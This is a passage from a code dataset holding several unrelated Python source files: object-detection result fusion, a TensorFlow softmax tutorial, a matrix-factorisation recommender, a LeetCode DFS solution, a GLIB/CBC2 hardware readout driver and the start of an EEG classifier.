nanshangongyuan\n templist=fliter(templist,fliterscore[\"15_nanshan\"],AnotPath=\"/root/data/gvision/dataset/xml/15_Nanshani_Park.xml\",\n segma_woh=3,segma_area=2,up_bound=1500,down_bound=7000,down_fs=None,yichang=0)\n if 451<=imageid<=465:#16xiaoxue----------01\n templist=fliter(templist,fliterscore[\"1601_shool\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_16_01_01.xml\",\n segma_woh=3,segma_area=3,up_bound=0,down_bound=None,down_fs=None,yichang=0)\n if 466<=imageid<=480:#16xiaoxue--------02\n templist=fliter(templist,fliterscore[\"1602_shool\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_16_25_02_.xml\",\n segma_woh=3,segma_area=3,up_bound=0,down_bound=None,down_fs=None,yichang=0)\n if 481<=imageid<=510:#17zhongguan\n templist=fliter(templist,fliterscore[\"17_newzhongguan\"],AnotPath=\"/root/data/gvision/dataset/xml/17_New_Zhongguan.xml\",\n segma_woh=3,segma_area=3,up_bound=6000,down_bound=7000,down_fs=None,yichang=0)\n if 511<=imageid<=540:#18xilin-------01\n templist=fliter(templist,fliterscore[\"1801_xilin\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_18_01_01.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=None,yichang=0)\n if 541<=imageid<=555:#18xilin----------02\n templist=fliter(templist,fliterscore[\"1802_xilin\"],AnotPath=\"/root/data/gvision/dataset/xml/IMG_18_02.xml\",\n segma_woh=3,segma_area=3,up_bound=4000,down_bound=None,down_fs=None,yichang=0)\n if test:\n print(f\"del_inter after len {len(templist)}\")\n return templist\n executor = ThreadPoolExecutor(max_workers=80)\n func_var = [[file_name,dict_value] for file_name,dict_value in mergedresults.items()]\n print(\"fusion bbox into self'image start \")\n pbar2= tqdm(total=len(mergedresults), ncols=50)\n for temp in executor.map(say2,func_var):\n # print(temp)\n savelist+=temp\n pbar2.update(1)\n pbar2.close()\n # assert len(savelist)==0,f\"error{savelist} error\"\n if savejson:\n assert isinstance(savelist[0], dict),f\"the results must is not {savelist[0]}\" \n # if not isinstance(savelist[0], dict):\n # raise f\"the results must is not {savelist[0]}\" \n # print(savelist[0]['category_id'])\n outfile=outfile[:-5].replace(\"all\",f\"{savelist[1]['category_id']}\")+\".json\"\n with open(os.path.join(outpath, outfile), 'w') as f:\n dict_str = json.dumps(savelist, indent=2)\n f.write(dict_str)\n print(f\"save ***{len(savelist)} results*** json :{os.path.join(outpath, outfile)}\")\n return savelist\n \ndef model_fusion( outpath=\"/root/data/gvision/my_merge/fusion_results\",\n outfile=\"fafaxue_final_wnms_all.json\",model_num=4):\n results_all=[[],[],[],[]]\n a=[\"14\",\"15\",\"16\",\"17\",\"18\"]\n b=[\"15\",\"16\",\"17\"]\n no=[\"no\"]\n \"selected1,selected2,selected3,selected4 不同类别选择不同场景\"\n \n json_root=\"/root/data/gvision/final_merge/\"\n for idj,i in enumerate(zip(\n list(results_resolve(model_path=\"/root/data/gvision/final_merge/final6/det_results.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n list(results_resolve(model_path=json_root+\"123/coco_results/detectors_reusme_fafaxue/detectors_reusme_delinter0isfliter1123datasetfafaxuesetnms0.6.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n # list(results_resolve(model_path=json_root+\"bicle/coco_results/efficident_else/efficident_delinter0isfliter1bicledatasetelsesetnms0.6.json\",weight=[0.8,0.8,0.8,0.8],\n # selected1=no,selected2=no,selected3=no,selected4=b)),\n\n # list(results_resolve(model_path=json_root+\"bicle/coco_results/efficident_bigcar/efficident_delinter0isfliter1bicledatasetbigcarsetnms0.6.json\",weight=[0.8,0.8,0.8,0.8],\n # selected1=no,selected2=no,selected3=no,selected4=b)),\n\n\n list(results_resolve(model_path=json_root+\"head/coco_results/detectors_reusme_fafaxue/detectors_reusme_delinter0isfliter1headdatasetfafaxuenms0.6.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)),\n\n list(results_resolve(model_path=json_root+\"head/coco_results/m2retinaface_head.json\",weight=[1,1,1,1],\n selected1=no,selected2=no,selected3=a,selected4=no)))):\n # for idj,i in enumerate(zip(\n # list(results_resolve(model_path=\"/root/data/gvision/my_merge/finalsubmission/fafafinal/det_results.json\",weight=[1,1,1,1])),\n # list(results_resolve(model_path=\"/root/data/gvision/my_merge/finalsubmission/final2/all.json\",weight=[0.3,0.3,0.3,0.3])),\n # )):\n a=[]\n for j in range(model_num): \n a+=i[j]\n results_all[idj]=a\n\n results1,results2,results3,results4=results_all[0],results_all[1],results_all[2],results_all[3]\n # print(results_all)\n # assert results1[0][\"category_id\"]==1,f'4 error {results1[0][\"category_id\"]}'\n # assert results2[0][\"category_id\"]==2,f'4 error {results2[0][\"category_id\"]}'\n assert results3[0][\"category_id\"]==3,f'4 error {results3[0][\"category_id\"]}'\n # assert results4[0][\"category_id\"]==4,f'4 error {results4[0][\"category_id\"]}'\n # assert type(results1[0][\"category_id\"])==int,f'4 error '\n # assert type(results2[0][\"category_id\"])==int,f'4 error '\n assert type(results3[0][\"category_id\"])==int,f'4 error '\n # assert type(results4[0][\"category_id\"])==int,f'4 error '\n\n\n # afternms_results1=wnms(results1,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"softnms\")#\n\n # afternms_results2=wnms(results2,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"softnms\")#\n\n afternms_results3=wnms(results3,outpath,outfile=outfile,iouthresh=0.3,savejson=1,nmsname=\"nms\")#\"nms\")#\n\n # afternms_results4=wnms(results4,outpath,outfile=outfile,iouthresh=1,savejson=0,nmsname=\"softnms\")#\"nms\")#\n\n # afternms_results_all=afternms_results1+afternms_results2+afternms_results3+afternms_results4\n # with open(os.path.join(outpath, outfile), 'w') as f:\n # dict_str = json.dumps(afternms_results_all, indent=2)\n # f.write(dict_str)\n # print(f\"save ***{len(afternms_results_all)} results*** json :{os.path.join(outpath, outfile)}\")\n\n\n\n\ndef main():\n global test,isdel_inter,isfliter,fliterscore\n fliterscore={\"14_OCT\":0,\"15_nanshan\":0,\"1601_shool\":0,\"1602_shool\":0,\"17_newzhongguan\":0,\"1801_xilin\":0,\"1802_xilin\":0}\n isfliter=1#fliter score xml\n isdel_inter=0\n test=0\n\n if test:\n outpath=\"/root/data/gvision/my_merge/fusion_results\"\n else:\n outpath=\"/root/data/gvision/final_merge/fusion_results\"\n model_fusion(outpath=outpath,\n outfile=\"fusion_headnms_all.json\")#must all\n\nif __name__ == \"__main__\":\n main()","sub_path":"my_tools/results_fusion3.py","file_name":"results_fusion3.py","file_ext":"py","file_size_in_byte":16492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"483261072","text":"import tensorflow as tf\n\n# 1. 학습에 사용할 데이터 셋\nx_data = [[1, 2, 1],\n [1, 3, 2],\n [1, 3, 4],\n [1, 5, 5],\n [1, 7, 5],\n [1, 2, 5],\n [1, 6, 6],\n [1, 7, 7]]\ny_data = [[0, 0, 1],\n [0, 0, 1],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 0],\n [0, 1, 0],\n [1, 0, 0],\n [1, 0, 0]]\n\n# 테스트 데이터 셋\nx_test = [[2, 1, 1],\n [3, 1, 2],\n [3, 3, 4]]\ny_test = [[0, 0, 1],\n [0, 0, 1],\n [0, 0, 1]]\n\n# 2. 텐서를 위한 X, Y 플레이스홀더\nX = tf.placeholder(tf.float32, shape=[None, 3]) # 3종류의 정보 입력\nY = tf.placeholder(tf.float32, shape=[None, 3]) # 3개의 결과\nnb_classes = 3\n\n# 3. 가중치와 bias\nW = tf.Variable(tf.random_normal([3, nb_classes]), name=\"weight\")\nb = tf.Variable(tf.random_normal([nb_classes]), name='bias')\n\n# 4. 가설\n# softmax = exp(logits) / reduce_sum(exp(logits), dim)\nlogits = tf.matmul(X, W) + b\nhypothesis = tf.nn.softmax(logits)\n\n# 5. 비용함수(다양한 형태 - cross entropy) - 전달 파라미터 주의 !!\n# 주의할 점은 Y_one_hot은 label로 1개의1, 여러개의 0으로 이루어진 one_hot 벡터 이어야 한다.\n# 그러면 각각의 logit에 대한 오차값이 결과로 나오고 그것을 tf.reduce_mean해주면 전체에 대한 평균오차값이 나온다.\ncost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n#cost_i = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=Y_one_hot)\n#cost = tf.reduce_mean(cost_i) # 전체에 대한 평균오차값\n\n# 최적화\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=1e-1)\ntrain = optimizer.minimize(cost)\n\n# 정확도 계산\n# argmax() : [0.1, 0.3, 0.5]의 argmax는 1로 가장 큰 값의 index 출력\nprediction = tf.argmax(hypothesis, 1) # 가장 높은 값을 가지는 index반환\ncorrect_prediction = tf.equal(prediction, tf.argmax(Y, 1)) # 맞는지 확인\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, dtype=tf.float32))\n\n# 세션\nwith tf.Session() as sess:\n # 변수 초기화\n sess.run(tf.global_variables_initializer())\n\n # 학습\n for step in range(201):\n # 학습 데이터만 사용해서 학습\n cost_val, W_val, acc, _ = sess.run([cost, W, accuracy, train], feed_dict={X:x_data, Y:y_data})\n\n #print(\"Step: {:5}\\tCost: {:.3f}\\tWeight: {:.3f}\\tAcc: {:.2%}\".format(step, cost_val, W_val, acc))\n print(step, cost_val, W_val, acc)\n\n # 예측 - 테스트 데이터만 사용해서 처리\n print(\"Prediction:\", sess.run(prediction, feed_dict={X: x_test}))\n # 정확도 계산\n print(\"Accuracy: \", sess.run(accuracy, feed_dict={X: x_test, Y: y_test}))","sub_path":"DeepLearningZeroToAll/ch07/learning_rate_eval.py","file_name":"learning_rate_eval.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"570661899","text":"# Autor:Oscar Macias Rodríguez, A01376398\r\n# Calcula el porcentaje de hombres y mujeres inscritos en una clase\r\n\r\n\r\nm = int(input(\"Mujeres inscritas:\"))\r\nh = int(input(\"Hombres inscritos:\"))\r\ntotal = m+h\r\np1 = m*100/total\r\np2 = h*100/total\r\n\r\nprint(\"Total de inscritos:\", total)\r\nprint(\"Porcentaje de mujeres:\", \"%.1f\" % p1)\r\nprint(\"Porcentaje de hombres:\", \"%.1f\" % p2)","sub_path":"Porcentajes.py","file_name":"Porcentajes.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"340135703","text":"class Solution(object):\n def pacificAtlantic(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n if not matrix: return []\n self.directions = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n m = len(matrix)\n n = len(matrix[0])\n toP = [[False for _ in range(n)] for _ in range(m)]\n\n toA = [[False for _ in range(n)] for _ in range(m)]\n result = []\n # visit back-ward: from edge to other nodes\n for i in range(m):\n # toP[i][0] = True\n # toA[i][n-1] = True\n self.dfs(matrix, i, 0, toP, m, n)\n self.dfs(matrix, i, n - 1, toA, m, n)\n for j in range(n):\n # toP[0][j] = True\n # toA[m-1][j] = True\n self.dfs(matrix, 0, j, toP, m, n)\n self.dfs(matrix, m - 1, j, toA, m, n)\n\n for i in range(m):\n for j in range(n):\n if toP[i][j] and toA[i][j]:\n result.append([i, j])\n return result\n\n def dfs(self, matrix, i, j, visited, m, n):\n # when dfs called, meaning its caller already verified this point\n visited[i][j] = True\n for dir in self.directions:\n x, y = i + dir[0], j + dir[1]\n if x < 0 or x >= m or y < 0 or y >= n or visited[x][y] or matrix[x][y] < matrix[i][j]:\n continue\n self.dfs(matrix, x, y, visited, m, n)","sub_path":"417_pacific_atlantic_water_flow/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"57027272","text":"# coding=utf-8\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport random\n\n'''\nnearly done\n'''\n\nusers = 943 # 1-943\nitems = 1682 # 1-1682\n\ndef load_data():\n\n train = {}\n test = {}\n train_file = 'ml-100k/ua.base'\n test_file = 'ml-100k/ua.test'\n\n for line in open(train_file):\n u, i, r, t = map(int, line.strip().split())\n train.setdefault(u,{})\n train[u][i] = float(r)\n\n for line in open(test_file):\n u, i, r, t = map(int, line.strip().split())\n test.setdefault(u,{})\n test[u][i] = float(r)\n\n return train, test\n\ndef init_parameters(train, cap_K):\n P = {}\n Q = {}\n weight = 1. / np.sqrt(cap_K)\n for u in train:\n for i in train[u]:\n if u not in P:\n P[u] = np.random.rand(1, cap_K) * weight\n if i not in Q:\n Q[i] = np.random.rand(1, cap_K) * weight\n return P, Q\n\ndef predict(p, q):\n r_hat = np.dot(p, q.T)\n return r_hat\n\ndef rmse(errors):\n errors = np.array(errors)\n return np.sqrt(np.mean(np.power(errors, 2)))\n\ndef get_rmse(data, P, Q):\n error_sum = 0\n count = 0.\n for u in data:\n for i in data[u]:\n if u in P and i in Q:\n r_hat = predict(P[u], Q[i])\n error_sum += (data[u][i] - r_hat)**2\n count += 1.\n rmse = math.sqrt(error_sum / count)\n return rmse\n\ndef LFM(steps, alpha, lamda, cap_K):\n train, test = load_data()\n P, Q = init_parameters(train, cap_K)\n for index in range(steps):\n errors = []\n for u in train:\n for i in train[u]:\n r_hat = predict(P[u], Q[i])\n error = train[u][i] - r_hat\n P[u] += alpha * (error * Q[i] - lamda * P[u])\n Q[i] += alpha * (error * P[u] - lamda * Q[i])\n errors.append(error)\n train_rmse = rmse(errors)\n test_rmse = get_rmse(test, P, Q)\n print(index, 'train_RMSE =', train_rmse, '><', 'test_RMSE =', test_rmse)\n\n\n\nif __name__ == '__main__':\n steps = 100\n alpha = 0.01\n lamda = 0.1\n cap_K = 10\n LFM(steps, alpha, lamda, cap_K)","sub_path":"rec_LFM.py","file_name":"rec_LFM.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"47525626","text":"import os\nfrom setuptools import setup, find_packages\n\ndescription_file = os.path.join(os.path.dirname(__file__), 'README.md')\nwith open(description_file) as fh:\n DESCRIPTION = fh.read()\n\n\nif __name__ == '__main__':\n setup(name='datasets',\n version='0.0.1',\n author='Patricio Cerda',\n author_email='patricio.cerda@inria.fr',\n description=(\"Datasets for prediction with string categorical variables\"),\n long_description=DESCRIPTION,\n license='BSD',\n classifiers=[\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Software Development :: Libraries',\n ],\n platforms='any',\n packages=find_packages(),\n install_requires=['pandas', 'requests'],\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"247503399","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Glib (and FW) representation.\"\"\"\r\n\r\n\r\n\r\nfrom copy import deepcopy\r\nimport datetime\r\nimport numpy as np\r\nimport os\r\nimport time\r\nimport xml.etree.ElementTree as et\r\nimport yaml\r\n\r\nfrom .. import util\r\nfrom . import cbc2\r\n\r\n\r\n\r\n# event dtype for an fw cbc2 event\r\nevents_dtype = np.dtype([\r\n ('bunch', ' broken_word_in_events)]\r\n\r\n if mask:\r\n mask = np.ones(no_events, dtype=np.bool)\r\n mask[really_broken_events] = False\r\n return really_broken_events, mask\r\n\r\n else:\r\n return really_broken_events\r\n\r\n\r\n def collect(self, **kwargs):\r\n\r\n overall_no_events = kwargs.get('no_events', 100)\r\n dataset = kwargs.get('dataset', False)\r\n index = kwargs.get('index', False)\r\n mode = kwargs.get('mode', 'safe')\r\n\r\n # trigger ? select if internal or external trigger should be used\r\n\r\n # consider maximum sram capacity\r\n blocksize = (4*9+6) # no words for 2cbc2 event\r\n max_no_events = int(2000000/blocksize)-3 # 47616\r\n\r\n # check if mode is known\r\n if mode not in ['lossy', 'safe', 'unsafe']:\r\n raise Exception('unknown event collection mode: '+str(mode))\r\n\r\n # if dataset and index has been given (when data for the complete \"collection\" will not fit in the memory)\r\n if dataset and index:\r\n persistance = True\r\n else:\r\n persistance = False\r\n cache = [] # buffer for all events\r\n\r\n # choose sram readout safety\r\n if mode in ['lossy', 'unsafe']:\r\n safe = False\r\n else:\r\n safe = True\r\n\r\n # choose readout strategy based on mode\r\n if mode == 'lossy':\r\n no_events_read = 0\r\n\r\n # need a flexible loop to compensate lossy readout\r\n while no_events_read < overall_no_events:\r\n\r\n no_events_rest = overall_no_events - no_events_read\r\n\r\n if no_events_rest >= max_no_events:\r\n # collect as many events as are possible\r\n next_no_events = max_no_events\r\n\r\n else:\r\n # collect residual events\r\n next_no_events = no_events_rest\r\n\r\n # try to forecast how many events are lost and collect sufficient enough\r\n if next_no_events > 255/blocksize:\r\n new_next_no_events = next_no_events\r\n last_next_no_events = 0\r\n while True:\r\n broken_events = self.__find_broken_events(new_next_no_events, blocksize)\r\n new_next_no_events = next_no_events+broken_events.size\r\n\r\n # stop if more than max_no_events need to be catched\r\n if new_next_no_events >= max_no_events:\r\n next_no_events = max_no_events\r\n break\r\n # or if no additional bad events 'created' by incorporating new ones\r\n elif new_next_no_events == last_next_no_events:\r\n next_no_events = new_next_no_events\r\n break\r\n # otherwise save current guestimation for next iteration\r\n else:\r\n last_next_no_events = new_next_no_events\r\n\r\n events = self.__collect_events(next_no_events, blocksize, safe)\r\n\r\n # remove broken events\r\n if events.size > 255/blocksize:\r\n broken_events_idxs, broken_events_mask = self.__find_broken_events(events.size, blocksize, mask=True)\r\n events = events[broken_events_mask]\r\n\r\n if persistance:\r\n dataset[index + np.index_exp[no_events_read:no_events_read+events.size]] = events\r\n else:\r\n cache.append(events)\r\n\r\n print(overall_no_events, no_events_read, events.size)\r\n\r\n no_events_read += events.size\r\n\r\n elif mode in ['safe', 'unsafe']:\r\n\r\n # main loop of daq\r\n for i, offset in enumerate(range(0, overall_no_events, max_no_events)):\r\n\r\n # calculate how many events should be read in this iteration\r\n if overall_no_events - offset >= max_no_events:\r\n next_no_events = max_no_events\r\n else:\r\n next_no_events = overall_no_events - offset\r\n\r\n events = self.__collect_events(next_no_events, blocksize, safe)\r\n\r\n print(offset, overall_no_events, next_no_events, max_no_events, next_no_events*blocksize)\r\n\r\n if persistance:\r\n dataset[index + np.index_exp[offset:offset+next_no_events]] = events\r\n else:\r\n cache.append(events)\r\n\r\n\r\n if not persistance:\r\n return np.concatenate(cache)\r\n\r\n\r\n def list_registers(self):\r\n\r\n return(sorted(self.__uhal_device.getNodes()))\r\n\r\n\r\n def register_info(self, name):\r\n\r\n node = self.__uhal_device.getNode(name)\r\n register = node.read()\r\n self.__uhal_device.dispatch()\r\n print(name,\r\n node.getAddress(),\r\n node.getMask(),\r\n node.getMode(),\r\n node.getPermission(),\r\n node.getSize(),\r\n node.getTags(),\r\n node.getParameters(),\r\n register)\r\n\r\n\r\n def read_sram_blocks(self, name, no_words, debug=False, safe=True):\r\n\r\n # print('read_sram_blocks: safe=>', safe)\r\n if safe:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(no_words)\r\n self.__uhal_device.dispatch()\r\n blocks_read = np.asarray(blocks_read).copy()\r\n # try to fix the brocken ones\r\n if len(blocks_read) > 255:\r\n broken_words = np.concatenate(((255, ), np.arange(255+347, no_words, 347)))\r\n for block in np.split(broken_words, np.arange(0, broken_words.size, 255)):\r\n new_words = []\r\n for i in block:\r\n new_words.append((i, self.__uhal_device.getNode(name).readBlockOffset(2, int(i-1))))\r\n self.__uhal_device.dispatch()\r\n for i, word in new_words:\r\n blocks_read[i] = word[1]\r\n return blocks_read\r\n else:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(no_words)\r\n self.__uhal_device.dispatch()\r\n return np.asarray(blocks_read).copy()\r\n\r\n\r\n def read_multiple_registers(self, names):\r\n values = []\r\n for name in names:\r\n values.append(self.read_register(name))\r\n return values\r\n def read_register(self, name):\r\n reg = self.__uhal_device.getNode(name).read()\r\n self.__uhal_device.dispatch()\r\n return(reg.value())\r\n def write_multiple_registers(self, registers):\r\n for name, value in registers:\r\n self.__uhal_device.getNode(name).write(value)\r\n self.__uhal_device.dispatch()\r\n def write_register(self, name, value):\r\n self.__uhal_device.getNode(name).write(value)\r\n self.__uhal_device.dispatch()\r\n def write_sram_blocks(self, name, blocks, debug=False, safe=True):\r\n size = len(blocks)\r\n if debug:\r\n blocks_read = []\r\n # print('trying to write: '+str(size))\r\n if safe:\r\n # chop transaction into pieces of 255 words, to circumvent the fw 256 bug\r\n for offset in range(0, size, 255):\r\n if size - offset >= 255:\r\n length = 255\r\n else:\r\n length = size - offset\r\n # print('wrote length '+str(length))\r\n blocks_write = blocks[offset:offset+length]\r\n self.__uhal_device.getNode(name).writeBlockOffset(blocks_write, offset)\r\n self.__uhal_device.dispatch()\r\n\r\n if debug:\r\n blocks_255 = self.__uhal_device.getNode(name).readBlockOffset(length, offset)\r\n self.__uhal_device.dispatch()\r\n blocks_read.extend(np.asarray(blocks_255).copy())\r\n else:\r\n self.__uhal_device.getNode(name).writeBlock(blocks)\r\n self.__uhal_device.dispatch()\r\n if debug:\r\n blocks_read = self.__uhal_device.getNode(name).readBlock(size)\r\n self.__uhal_device.dispatch()\r\n blocks_read = np.asarray(blocks_read).copy()\r\n\r\n if debug:\r\n if not safe:\r\n print('debug used when not safe')\r\n if len(blocks)!= len(blocks_read):\r\n raise Exception('blocks written ('+str(len(blocks))+') and read back ('+str(len(blocks_read))+') do not have the same lenth')\r\n mismatches = []\r\n for i, (bw, br) in enumerate(zip(blocks, blocks_read)):\r\n if bw != br:\r\n mismatches.append((i, (bw, br)))\r\n return mismatches\r\n\r\n\r\n\r\n def write_from_file(self, filename):\r\n tree = et.parse(filename)\r\n root = tree.getroot()\r\n registers = []\r\n for node in root:\r\n if node.tag == 'Register':\r\n registers.append((node.attrib['name'], int(node.text)))\r\n self.write_multiple_registers(registers)\r\n\r\n\r\n\r\n\r\n\r\n # 2X bits = X for frontend_id > 4 for cbc_id > 1 for page > 8 for address > 8 for value\r\n def _cbc_register_to_block(self, frontend_id, cbc_id, page, address, value):\r\n return frontend_id<<21 | cbc_id<<17 | page<<16 | address<<8 | value\r\n def _block_to_cbc_register(self, register):\r\n reg=bin(register)[2:].zfill(24)\r\n return int(reg[:-21], base=2), int(reg[-20:-17], base=2), int(reg[-17:-16], base=2), int(reg[-16:-8], base=2), int(reg[-8:], base=2)\r\n def _wait_for_i2c_ack(self, ackval, dummy):\r\n wait_length = 0.001\r\n while not self.read_register('cbc_i2c_cmd_ack') == ackval:\r\n time.sleep(wait_length)\r\n # print('waiting ... for i2c cmd ack '+str(ackval)+' '+str(dummy))\r\n def _wait_for_cmd_start_valid(self):\r\n wait_length = 0.001\r\n while self.read_register('user_wb_ttc_fmc_regs.status_flags.CMD_START_VALID') == 0:\r\n time.sleep(wait_length)\r\n # print('waiting for cmd start valid')\r\n def _wait_for_sram_full(self, sram_full, ack_value, info=''):\r\n wait_length = 0.001\r\n while self.read_register(sram_full) == ack_value:\r\n time.sleep(wait_length)\r\n # print('waiting sram full '+str(ack_value)+' '+info)\r\n\r\n\r\n\r\n def update_cbcs(self, **kwargs):\r\n write = kwargs.get('write', True)\r\n debug = kwargs.get('debug', 'diff') # diff, full\r\n self.cbcs = kwargs.get('cbcs', self.cbcs) # replace existing cbcs with the configurations\r\n if debug:\r\n debugw = True\r\n else:\r\n debugw = False\r\n\r\n blocks_write = [] # data to be written to the glib sram\r\n control_data = [] # control data / needed to check back\r\n for n, cbc in enumerate(self.cbcs):\r\n for name in sorted(cbc.registers.keys()):\r\n value = cbc.registers[name]\r\n page, address, default = cbc2.cbc2.registers_name2address[name]\r\n control_data.append((name, self.__frontend_id, n, page, address, value))\r\n blocks_write.append(self._cbc_register_to_block(self.__frontend_id, n, page, address, value))\r\n blocks_write.append(0xFFFFFFFF)\r\n\r\n # enable i2c-ctrl\r\n self.write_register('user_wb_ttc_fmc_regs.cbc_reg_i2c_settings', 0x000009F4)\r\n time.sleep(0.001)\r\n\r\n # fill data into sram for i2c transaction\r\n self.write_register(self.__sram1_user_logic, 0)\r\n write_diff = self.write_sram_blocks(self.__sram1, blocks_write, debug=debugw)\r\n self.write_register(self.__sram1_user_logic, 1)\r\n\r\n self.write_register(self.__sram2_user_logic, 0)\r\n self.write_register(self.__sram2, 0xFFFFFFFF)\r\n self.write_register(self.__sram2_user_logic, 1)\r\n\r\n # hard reset of the chip\r\n # if write:\r\n # self.write_register(self.__cbc_hard_reset, 1)\r\n # time.sleep(0.01)\r\n # self.write_register(self.__cbc_hard_reset, 0)\r\n # time.sleep(0.01)\r\n\r\n\r\n # make the fw chew the i2c blocks\r\n if write:\r\n self.write_register(self.__cbc_i2c_req, 3)\r\n else:\r\n self.write_register(self.__cbc_i2c_req, 1)\r\n self._wait_for_i2c_ack(1, 'write0')\r\n self.write_register(self.__cbc_i2c_req, 0)\r\n self._wait_for_i2c_ack(0, 'write1')\r\n\r\n # read back values from i2c\r\n self.write_register(self.__sram1_user_logic, 0)\r\n blocks_read = self.read_sram_blocks(self.__sram1, len(blocks_write))\r\n self.write_register(self.__sram1_user_logic, 1)\r\n #self.write_register(self.__sram2_user_logic, 0)\r\n #self.write_register(self.__sram2_user_logic, 1)\r\n self.write_register(self.__cbc_i2c_req, 0)\r\n self._wait_for_i2c_ack(0, 'read')\r\n\r\n # disable i2c-ctrl\r\n self.write_register('user_wb_ttc_fmc_regs.cbc_reg_i2c_settings', 0)\r\n time.sleep(0.001)\r\n\r\n\r\n if not (len(control_data)+1 == len(blocks_write) == len(blocks_read)):\r\n raise Exception('unequal length between control+1('+str(len(control_data)+1)+'), write('+str(len(write))+') and read('+str(len(read))+')')\r\n\r\n if debug in ('diff', 'full') :\r\n result = []\r\n\r\n for i, (read, write, control) in enumerate(zip(blocks_read, blocks_write, control_data)):\r\n control_name, control_fe_id, control_cbc_id, control_page, control_address, control_value = control\r\n write_fe_id, write_cbc_id, write_page, write_address, write_value = self._block_to_cbc_register(write)\r\n read_fe_id, read_cbc_id, read_page, read_address, read_value = self._block_to_cbc_register(read)\r\n\r\n if write: #allow no differences when writing to sram\r\n if (not (control_fe_id == write_fe_id == read_fe_id) or\r\n not (control_cbc_id == write_cbc_id == read_cbc_id) or\r\n not (control_page == write_page == read_page) or\r\n not (control_address == write_address == read_address) or\r\n not (control_value == write_value == read_value) and\r\n debug == 'diff') or (debug=='full'):\r\n\r\n result.append((\r\n control_name,\r\n (control_fe_id, write_fe_id, read_fe_id),\r\n (control_cbc_id, write_cbc_id, read_cbc_id),\r\n (control_page, write_page, read_page),\r\n (control_address, write_address, read_address),\r\n (control_value, write_value, read_value)\r\n ))\r\n else: # allow differences between values and update cbc value\r\n if (not (control_fe_id == write_fe_id == read_fe_id) or\r\n not (control_cbc_id == write_cbc_id == read_cbc_id) or\r\n not (control_page == write_page == read_page) or\r\n not (control_address == write_address == read_address) and debug == 'diff') or debug=='full':\r\n\r\n result.append((\r\n control_name,\r\n (control_fe_id, write_fe_id, read_fe_id),\r\n (control_cbc_id, write_cbc_id, read_cbc_id),\r\n (control_page, write_page, read_page),\r\n (control_address, write_address, read_address),\r\n (control_value, write_value, read_value)\r\n ))\r\n self.cbcs[control_cbc_id].registers[control_name] = read_value\r\n\r\n return write_diff, result\r\n\r\n","sub_path":"trkpy/hardware/glib.py","file_name":"glib.py","file_ext":"py","file_size_in_byte":24862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"111025282","text":"\"\"\"\nAuthor: Yash Patel\nName: EEGPredict.py\nDescription: Given the readings of an EEG measuring the \nfrequencies of signals, determine what type of motion conducted\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport csv as csv\nfrom sklearn.ensemble import RandomForestClassifier\n\nNUM_COLUMNS = 32\n\nNUM_SUBJECTS = 12\nNUM_SERIES = 8\nNUM_TESTS = 2\nSTART_TEST = 9\n\n# Offset used to account for counting index in loops\nOFFSET = 1\n\ndef formatData(data):\n \"\"\"Takes in data and returns new dataframe with each\n row corresponding to the difference between the original row\n and the one preceeding it (first row defaults to 0s)\n\n Keyword arguments:\n data -- read-in data (formatted as Pandas dataframe)\n \"\"\"\n\n ids = data['id']\n train_diff = data.drop(['id'], axis=1) - \\\n data.shift(1).drop(['id'], axis=1)\n train_diff['id'] = ids\n\n default_row = [0 for x in range(NUM_COLUMNS)]\n default_row.append(ids[0])\n train_diff.loc[train_diff['id'] == ids[0]] = default_row\n train_diff = train_diff.drop(['id'], axis=1)\n return train_diff\n\ndef train():\n \"\"\"Trains the machine learning algorithm. Returns a predictor\n lookup dictionary formatted as {subject # : random forest predictor}\n \"\"\"\n\n predictorLookup = {}\n\n # Used for keying the joined tables further down\n START_LETTER = ord('a')\n END_LETTER = START_LETTER + NUM_SERIES\n keyLetters = [chr(letter) for letter in range(\n START_LETTER, END_LETTER)]\n\n for subject in range(NUM_SUBJECTS):\n data_frames = []\n events_frames = []\n curSubject = subject + OFFSET\n \n for series in range(NUM_SERIES):\n curSeries = subject + OFFSET\n\n print(\"Reading data for subject {}...\"\n 